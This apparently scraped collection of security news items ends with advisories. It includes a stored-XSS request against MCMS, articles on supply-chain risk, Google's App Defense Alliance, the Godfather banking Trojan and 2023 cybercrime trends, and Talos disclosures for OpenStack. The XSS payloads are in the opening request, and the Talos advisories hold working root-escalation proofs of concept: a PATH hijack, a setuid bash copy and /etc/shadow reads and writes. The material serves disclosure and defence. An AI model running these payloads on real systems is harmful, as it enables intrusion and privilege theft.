QxnC42tozLKzedLygLClhuxqvzHMGTnQg5J5nvmYWT96gc7uuEJnyQl4/62RY0bnQ/nj7b81nHxxZQeAUSico2GKeQjJGSTPNWMh++h8sdImqVvbE2ARhkgXsyOIQrmGTN8Tk+g2yVPG947S37PGdUCb2lfzRBV1UQipiNJ1HuSTbfSzNRY5Nfrer0xaI78+Mc5j7xoSswg1r5jsO/zFdL/66U+DO5Q8jsQTn8zjapBYK+nEa0=
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    contentTitle=<svg/onload=console.log('xss1')>&categoryId=1329257757913718785&contentType=<svg/onload=console.log('xss2')>&contentDisplay=0&contentAuthor=<svg/onload=console.log('xss3')>&contentSource=<svg/onload=console.log('xss4')>&contentSort=0&contentImg="><svg/onload%3dconsole.log('xss5')>"<&contentDescription=<svg/onload=console.log('xss6')>&contentKeyword=<svg/onload=console.log('xss7')>&contentDetails=<svg/onload=console.log('xss8')>&contentDatetime=2022-12-08%2005%3A19%3A37&id=0

CVE-2022-4640: v5.2.9 前台存储xss · Issue #I65KI5 · 铭飞/MCMS - Gitee.com

Security leaders must maintain an effective cybersecurity strategy to help filter some of the noise on new vulnerabilities.

The security industry collectively loses its mind when new vulnerabilities are discovered in software. OpenSSL is no exception, and two new vulnerabilities overwhelmed news feeds in late October and early November 2022. Discovery and disclosure are only the beginnings of this never-ending vulnerability cycle. Affected organizations are faced with remediation, which is especially painful for those on the front lines of IT. Security leaders must maintain an effective cybersecurity strategy to help filter some of the noise on new vulnerabilities, recognize impacts to supply chains, and secure their assets accordingly.

**Supply Chain Attacks Aren't Going Away**

In roughly a year's time, we've suffered through severe vulnerabilities in componentry including Log4j, Spring Framework, and OpenSSL. Exploitation of older vulnerabilities also never ceases from implementations that are misconfigured or that use known vulnerable dependencies. In November 2022, the public learned of an attack campaign against the Federal Civilian Executive Branch (FCEB), attributable to a state-sponsored Iranian threat. This US federal entity was running VMware Horizon infrastructure that contained the Log4Shell vulnerability, which served as the initial attack vector. FCEB was hit with a complex attack chain that included lateral movement, credential compromise, system compromise, network persistence, endpoint protection bypass, and cryptojacking.

Organizations may ask "why consume OSS at all?" after security incidents from vulnerable packages like OpenSSL or Log4j. Supply chain attacks continue trending upward because componentry reuse makes “good business sense” for partners and suppliers. We engineer systems by repurposing existing code rather than building from scratch. This is to reduce engineering effort, scale operationally, and deliver quickly. Open source software (OSS) is generally considered trustworthy by virtue of the public scrutiny it receives. However, software is ever-changing, and issues arise through coding mistakes or linked dependencies. New issues are also uncovered through evolution of testing and exploitation techniques.

**Tackling Supply Chain Vulnerabilities**

Organizations need appropriate tooling and process to secure modern designs. Traditional approaches such as vulnerability management or point-in-time assessments alone can't keep up. Regulations may still allow for these approaches, which perpetuates the divide between "secure" and "compliant." Most organizations aspire to obtain some level of DevOps maturity. "Continuous" and "automated" are common traits of DevOps practices. Security processes shouldn't differ. Security leaders must maintain focus throughout build, delivery, and runtime phases as part of their security strategy:

*   **Continuously scan in CI/CD:** Aim to secure build pipelines (i.e., shift-left) but acknowledge that you won't be able to scan all code and nested code. Success with shift-left approaches is limited by scanner efficacy, correlation of scanner output, automation of release decisions, and scanner completion within release windows. Tooling should help prioritize risk of findings. Not all findings are actionable, and vulnerabilities may not be exploitable in your architecture.

*   **Continuously scan during delivery:** Component compromise and environment drift happen. Applications, infrastructure, and workloads should be scanned while being delivered in case something was compromised in the digital supply chain when being sourced from registries or repositories and bootstrapped.

*   **Continuously scan in runtime:** Runtime security is the starting point of many security programs, and security monitoring underpins most cybersecurity efforts. You need mechanisms that can collect and correlate telemetry in all types of environments, though, including cloud, container, and Kubernetes environments. Insights gathered in runtime should feed back to earlier build and delivery stages. Identity and service interactions

*   **Prioritize vulnerabilities exposed in runtime:** All organizations struggle with having enough time and resources to scan and fix everything. Risk-based prioritization is fundamental to security program work. Internet exposure is just one factor. Another is vulnerability severity, and organizations often focus on high and critical severity issues since they're deemed to have the most impact. This approach can still waste cycles of engineering and security teams because they may be chasing vulnerabilities that never get loaded at runtime and that aren't exploitable. Use runtime intelligence to verify what packages actually get loaded in running applications and infrastructure to know the actual security risk to your organization.

We've created product-specific guidance to steer customers through the recent OpenSSL madness.

The latest OpenSSL vulnerability and Log4Shell remind us of the need for cybersecurity preparedness and effective security strategy. We must remember that CVE-IDs are just those known issues in public software or hardware. Many vulnerabilities go unreported, particularly weaknesses in homegrown code or environmental misconfigurations. Your cybersecurity strategy must account for distributed and diverse technology of modern designs. You need a modernized vulnerability management program that uses runtime insights to prioritize remediation work for engineering teams. You also need threat detection and response capabilities that correlate signals across environments to avoid surprises.

**About the Author**

    

Michael Isbitski, Director of Cybersecurity Strategy at Sysdig, has researched and advised on cybersecurity for over five years. He's versed in cloud security, container security, Kubernetes security, API security, security testing, mobile security, application protection, and secure continuous delivery. He's guided countless organizations globally in their security initiatives and supporting their business.

Prior to his research and advisory experience, Mike learned many hard lessons on the front lines of IT with over 20 years of practitioner and leadership experience focused on application security, vulnerability management, enterprise architecture, and systems engineering.

Supply Chain Risks Got You Down? Keep Calm and Get Strategic!

Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.

Google has announced Trend Micro will be joining their App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store. Trend Micro will be pre-scanning apps utilizing our Mobile App Reputation Service (MARS). We’re proud to be asked to support this alliance and join the other members who are part of this program which supports Trend Micro’s mission to make the World safe for exchanging digital information.

MARS, was initially developed and launched in 2012. protects our mobile customers by supporting a reputation service that checks any apps on their mobile devices. This uses a process whereby a query is sent by the customer to MARS, which then responds with a detection of whether the app is good, bad, or unknown. If unknown, we utilize threat intelligence to quickly make a determination. MARS received over 47 billion queries in 2021, resulting in 37 million malicious app detections. As of September 2022, MARS has received over 36 billion queries and made 27 million detections.

Trend Micro mobile researchers are regularly publishing articles and reports on mobile threats to help people better understand what this threat landscape looks like. Trend Micro will continue to invest in our research and development both in human capital and technology like artificial intelligence and machine learning to improve the mobile ecosystem. As one of the largest pure cybersecurity vendors in the world, this investment and focus allow us to protect both our partners like Google and our customers from cyber threats targeting them.

As more and more consumers rely on their mobile devices and the apps installed for everyday work and play, this partnership will ensure they are protected from malicious actors around the world. Trend Micro looks forward to a long partnership with Google.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Trend Micro Joins Google’s App Defense Alliance

The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.

A type of Android malware that's been targeting banking users worldwide since March has resurfaced with advanced obfuscation methods, masquerading as a legitimate application on the Google Play store with more than 10 million downloads, researchers have found.

Godfather is a banking Trojan that is best known for targeting banking users in European countries, but its latest activity shows an increased sophistication in its ability to fly under the radar of common malware-detection methods, researchers from Cyble Research & Intelligence Labs (CRIL) said in a blog post on Dec. 20.

Once it's successfully installed on a victim's device, Godfather initiates a series of typical banking Trojan behaviors, including stealing banking and crypto-exchange credentials, the researchers said. But it also steals sensitive data such as SMSs, basic device details — including data from installed applications — and the device's phone number, and it can perform a number of nefarious actions silently in the background.

"Apart from these, it can also control the device screen using VNC \[virtual network computing\], forwarding incoming calls of the victim's device and injecting banking URLs," the Cyble researchers wrote.

The latest sample of Godfather that researchers discovered was encrypted using custom encryption techniques that could evade detection by common antivirus products — a new tactic of the threat actors behind the malware, the researchers said.

**Targeting Businesses & Consumers**

Upon further examination, the researchers found that the malware was using an icon and name similar to the legitimate Google Play app MYT Music, which already has logged more than 10 million downloads. Indeed, threat actors often hide malware on Google Play, despite Google's best efforts in the last several years to keep bad apps off its store before users are affected by it.

MYT Music was written in the Turkish language and thus researchers assume the Godfather sample they discovered is targeting Android users in Turkey. However, they suspect other versions of the malware continue to be active and targeting banking users worldwide.

Though banking Trojans tend to affect consumers more than the enterprise, business users are still at risk because they use their mobile devices at work and may even have business apps and data stored on their devices. For this reason, enterprise users should be especially wary of downloading apps from the Internet or opening any links received via SMS or emails delivered to a mobile phone, the researchers said.

Google Play has removed the app, but those with it installed are still at risk.

**How Godfather Pulls Victims' Strings**

Once it's installed on an Android device, Godfather requests 23 different permissions from the device, abusing a number of them to gain access to a user's contacts and the state of the device, as well as information related to the user account. It also can write or delete files in external storage and disable the keylock and any associated password security, the Cyble researchers said.

Godfather can successfully do money transfers from a hacked device through its ability to initiate phone calls through Unstructured Supplementary Service Data (USSD) that don't require use of the dialer user interface, and thus don't need the user to confirm the call, they said.

The malware also extracts sensitive user data from the device — including application key logs — that can be sent back to a command-and-control (C2) server, which also sends Godfather a command that forwards any incoming calls the victim receives to a number provided by the threat actor, the researchers said.

Godfather then harvests credentials: It creates an overlay window in the OnAccessibilityEvent method and injects HTML phishing pages via a separate command from C2, the server URL of which is from a Telegram channel, hxxps://t\[.\]me/varezotukomirza, the researchers said.

Once it completes its malicious activity, Godfather receives a "killbot" command from C2 to self-terminate, they added.

**Avoiding Being Whacked by Godfather**

The most common way to avoid downloading mobile app malware is to download and install software only from official app stores such as Google Play or Apple, the conventional wisdom goes.

However, as this instance proves, malware can lurk in official app stores too, so "practicing basic cyber-hygiene across mobile devices and online banking applications effectively prevents such malware from compromising your devices," the researchers noted in the post, including using a reputable antivirus and Internet security software package on connected devices to ensure anything downloaded is free from malware.

Also, advanced anti-detection methods like the ones the threat actors behind Godfather are using can make even downloading what look like legitimate apps tricky, they said. To further protect themselves, users can utilize strong passwords and enforce multifactor authentication on devices wherever possible, making it more difficult for threat actors to crack into their accounts. 

Android device users also should ensure that Google Play Protect is enabled on their devices for further security protection, the Cyble researchers added.

All mobile device users also should enable biometric security features such as fingerprint or facial recognition for unlocking the mobile device and using apps, where possible, and be especially careful when enabling permissions on devices, especially if an app has not been verified by a reputable provider, they added.

Godfather Banking Trojan Masquerades as Legitimate Google Play App

More zero knowledge attacks, more leaked credentials, more Gen-Z cyber crimes - 2022 trends and 2023 predictions.
Cybercrime remains a major threat to individuals, businesses, and governments around the world. Cybercriminals continue to take advantage of the prevalence of digital devices and the internet to perpetrate their crimes. As the internet of things continues to develop, cybercriminals

More zero knowledge attacks, more leaked credentials, more Gen-Z cyber crimes - 2022 trends and 2023 predictions.

Cybercrime remains a major threat to individuals, businesses, and governments around the world. Cybercriminals continue to take advantage of the prevalence of digital devices and the internet to perpetrate their crimes. As the internet of things continues to develop, cybercriminals will have access to a greater number of vulnerable devices, allowing them to carry out more sophisticated attacks. Cybercrime is expected to become increasingly profitable as criminals continue to find new and better ways to monetize their attack as entry barriers to cybercrime keep going down.

This article discusses key trends we've noticed in 2022 that will likely continue in 2023, which we'll also elaborate on in the upcoming webinar "The Rise of the Rookie Hacker - a new trend to reckon with" on January 11th.

****Leaked credentials will continue to be the main attack vector for initial access****

According to IBM's cost of a breach 2022 report, use of stolen or compromised credentials remains the most common cause of a data breach.

The main source for leaked credentials in 2022 was Info-Stealers - a malware that can steal stored credentials from browsers, cookies (used for session hijacking and to bypass MFA), crypto wallets, and more. Redline Stealer, in particular, gained a lot of popularity among threat actors which led to the creation of several other stealers such as the "Luca stealer" and the "eternity stealer". The latter is part of an end-to-end offering named the eternity project, which allows threat actors to buy or rent any tool they need to launch an attack against a target of their choosing.

Stolen or compromised credentials were the primary attack vector in 19% of breaches in the 2022 study and also the top attack vector in the 2021 study. This trend is most likely to keep in its upward trajectory as a whopping 59% of organizations don't deploy zero-trust, incurring an average of 1 million USD in greater breach costs compared to those that do deploy. Until organizations' cybersecurity will mature, the volume and cost of breaches will continue to rise.

****A rise in zero-knowledge attacks****

Cybercrimes such as DDoS, malware, and ransomware are all offered as subscription services, lowering the entry barrier into cybercrime. For example, per the Microsoft Digital Defense Report 2022, phishing kits are offered on the dark web from as little as $6 and DDoS attack subscriptions for as little as $500. Ransomware-as-a-Service offered as an affiliates model is the preferred method by actors, this means "renting" an already made operation and splitting the revenue based on income and activity. The rise of "clearnet malware" - malware that can be purchased on everyday platforms like Telegram (Hello again eternity project!) helps simplify setting up a cybercrime campaign or operation. The proliferation of crypto payment platforms makes it even easier to trade in cybercrime products and services, pushing the entire cybercrime ecosystem even further.

****Younger threat actors - average age will continue to drop****

In terms of cyberattacks, 2022 was Gen Z's time to shine, leading with UK teen group Lapsus$ that went on a hacking spree targeting tech titans like Microsoft, Nvidia, Samsung, Ubisoft, and Okta. Generation Z is currently the largest generation on earth. Besides their strength in numbers, they are "digital natives", being born into a world with the internet, smartphones, cloud technologies, and social networks. Being young, they naturally crave social validation which they get in the digital sphere. Lapsus$'s main motivator was "Kudos" - they were "doing it for the lulz". The ease of launching zero-knowledge attacks, combined with Gen Z's digital nativeness and their need for social validation in the digital sphere will most likely contribute to the continuous drop in the average age of cyber criminals.

****We'll still need humans in the loop****

Enterprises invest billions of dollars deploying multi-layered security frameworks, platforms, and programs, but at the end of the day, enterprises are made of people, and people can be tricked.

Social engineering is an increasingly popular tactic used by cyberattackers to gain access to sensitive data. It involves exploiting human psychology to manipulate victims into providing confidential information or taking certain actions in order to gain access to a system or network.

LAPSUS$'s modus operandi was based on a text-book sim swapping scam. They bought credentials of the person with the right access to resources within an enterprise, called the phone provider, reporting the phone stolen, rerouted the sim to their own phone, triggered multi factor authentication on an enterprise access point (e.g. Office365 login page), and did a password reset. It was ridiculously simple and devastatingly efficient.

The best technology in the world can't completely remove the risk of human vulnerability. For that you need other humans trained in that. The cybersecurity workforce gap compelled enterprises to outsource this part of their cybersecurity to a managed detection and response (MDR) service. In fact, (according to Reportlinker.com) the global MDR market size is expected to grow from an estimated value of 2.6 billion USD in 2022 to 5.6 billion USD by 2027, at a Compound Annual Growth Rate (CAGR) of 16.0%. Technology is great, machines are great, but we still need humans.

Join Ronen Ahdut, Head of Cyber Threat Intelligence at Cynet for a webinar "The Rise of the Rookie Hacker - a new trend to reckon with" on January 11th at 10AM ET / 15:00 GMT. The webinar will deep-dive into 2023 cybersecurity trends, threats, and technology, including the need for human oversight in cybersecurity and how to detect these new threats.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Rise of the Rookie Hacker - A New Trend to Reckon With

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack Kolla provides container images and deployment tools for running OpenStack clouds with best practice configurations.

Several Kolla containers have a sudoers policy to allow the application to run limited commands as root, which appears to be defined here:

    Matching Defaults entries for nova on <host>:
        setenv
    
    User nova may run the following commands on <host>:
        (root) NOPASSWD: /usr/local/bin/kolla_copy_cacerts
        (root) NOPASSWD: /usr/local/bin/kolla_set_configs
        ...
    

Of note is the Defaults: %kolla setenv line in /etc/sudoers. This allows users in the kolla group to modify environment variables, and there is no secure_path option that enforces a trusted PATH environment variable. Therefore, the unprivileged user (nova in this example) can change the PATH variable used by sudo, and run arbitrary commands as root when the Kolla scripts call external programs.

Specifically, there are two Kolla-provided scripts that are exploitable via this sudoers configuration.

The first script, kolla\_copy\_cacerts, calls out to the update-ca-certificates program, which is resolved from the PATH environment variable. This can be exploited by creating a script named “update-ca-certificates” in some writable location, and adding this location to the PATH before running sudo -E kolla_copy_cacerts.

The second script, kolla\_set\_configs, reads an environment variable for a JSON object or a path to a file containing a JSON object. This JSON specifies the source, destination, ownership and permissions for OpenStack configuration files to be copied. This can be exploited by exporting an environment variable that specifies a program to be copied with its SETUID bit set, and running kolla_set_configs with sudo -E as above.

Some containers (e.g. nova\_api) with this configuration are privileged, so in that case, root access inside the container may equate to root privilege on the container host itself.

**Exploit Proof of Concept****Method 1 (kolla_copy_cacerts)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a script payload that will be executed as root:

    $ echo -e '#!/bin/sh\nexec bash -p' > /tmp/update-ca-certificates
    $ chmod 755 /tmp/update-ca-certificates
    

Update the shell’s PATH environment variable to include the directory that the payload is in, and run the affected script with sudo:

    $ PATH=/tmp:$PATH sudo -E /usr/local/bin/kolla_copy_cacerts
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Method 2 (kolla_set_configs)**

Observe current privilege level in container:

    $ id
    uid=42436(nova) gid=42436(nova) groups=42437(nova),42400(kolla),42427(qemu)
    

Create a JSON object to be parsed by the script and export it to the appropriate environment variable:

    $ export KOLLA_CONFIG='{"command":"echo test", "config_files":[{"source":"/bin/bash", "dest":"/tmp/bash", "owner":"root", "perm":"0o6755"}]}'
    

Run the affected script with sudo and then execute the copied shell:

    $ sudo -E /usr/local/bin/kolla_set_configs
    $ /tmp/bash -p
    # id
    uid=0(root) gid=0(root) groups=0(root)
    

**Mitigation**

/etc/sudoers within the container should use the secure_path option to prevent the PATH environment variable from being modified; however this will not prevent other possibly dangerous environment variables from being changed. Ideally, the setenv option would be removed from /etc/sudoers altogether, and env_keep could be used for any safe environment variables that do not introduce security holes.

To avoid container compromises resulting in host compromise, avoid using privileged containers; prefer adding individual capabilities as needed.

**TIMELINE**

2022-08-11 - Vendor Disclosure  
2022-08-11 - Initial Vendor Contact  
2022-12-20 - Public Release

CVE-2022-38060: TALOS-2022-1589 || Cisco Talos Intelligence Group

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**SUMMARY**

A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

OpenStack git master 05194e7618

**PRODUCT URLS**

OpenStack - https://opendev.org/openstack/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-269 - Improper Privilege Management

**DETAILS**

OpenStack is a cloud platform that contains a number of tools, libraries and services for providing simplified, powerful and scalable cloud-based applications.

OpenStack’s oslo.privsep library “helps applications perform actions which require more or less privileges… in a safe, easy to code and easy to use manner.” An entry in sudoers is generally added to bootstrap oslo.privsep with the correct privileges when run from an unprivileged user such as nova.

The oslo.privsep design documents state the following:

    Privileged functions must be as simple, specialized and narrow as possible, so as to prevent further escalation. In this example, 
    update_motd(message) is narrow: it only allows the service to overwrite the MOTD file. If a more generic update_file(filename, content) was created, 
    it could be used to overwrite any file in the filesystem, allowing easy escalation to root rights. That would defeat the whole purpose of oslo.privsep.
    ...
    Provided the unprivileged<->privileged boundary contains any hole that effectively grants root to the caller, then there is little benefit to having the separation [provided by privsep]
    

Two modules were observed to have functions that were overly broad and allowed for trivial escalation to root. The nova module contains privileged wrappers for chmod, chown and rmdir, as well as arbitrary file create/write/move/read. Second, the os\_brick module contains functions to execute arbitrary shell commands as root. The source file contains the following comment from 2016:

    Just in case it wasn't clear, this is a massive security back-door. [these wrappers] allow any command to be run as the privileged user (default "root"). 
    This is intended only as an expedient transition and should be removed ASAP.
    

Either of the above modules are sufficient to achieve privilege escalation to root. Other modules within OpenStack were not audited, but it is possible that similar issues exist elsewhere in the codebase.

**Crash Information****Method 1 (nova)**

    from nova.privsep.path import *
    from oslo_config.cfg import CONF
    CONF.privsep_context = 'nova.privsep.sys_admin_pctxt'
    # Read /etc/shadow
    last_bytes("/etc/shadow", 1000)
    # Write to /etc/shadow
    writefile("/etc/shadow", "wb", b"<payload_here>")
    # Get a root shell
    os.system("cp /bin/bash /tmp/bash")
    chown("/tmp/bash", 0)
    chmod("/tmp/bash", 0o4755)
    os.system("/tmp/bash -p")
    bash-5.1#
    

**Method 2 (os\_brick)**

    from os_brick.privileged.rootwrap import *
    from oslo_config.cfg import CONF
    import shlex # helpful for multi-arg commands
    CONF.privsep_context = 'os_brick.privileged.default'
    execute_root(*shlex.split("id"))
    ('uid=0(root) gid=0(root) groups=0(root)\n', '')
    

**Mitigation**

Privileged functions in the nova and os_brick modules of OpenStack should be rewritten to be as specialized and narrowly tailored as possible; e.g. chmod(path, mode) should be replaced with a function that only applies pre-defined permissions on one or more pre-defined files.

Suggest auditing other modules that use oslo.privsep to identify similar issues.

**TIMELINE**

2022-09-07 - Vendor Disclosure  
2022-12-20 - Public Release

Tag

#intel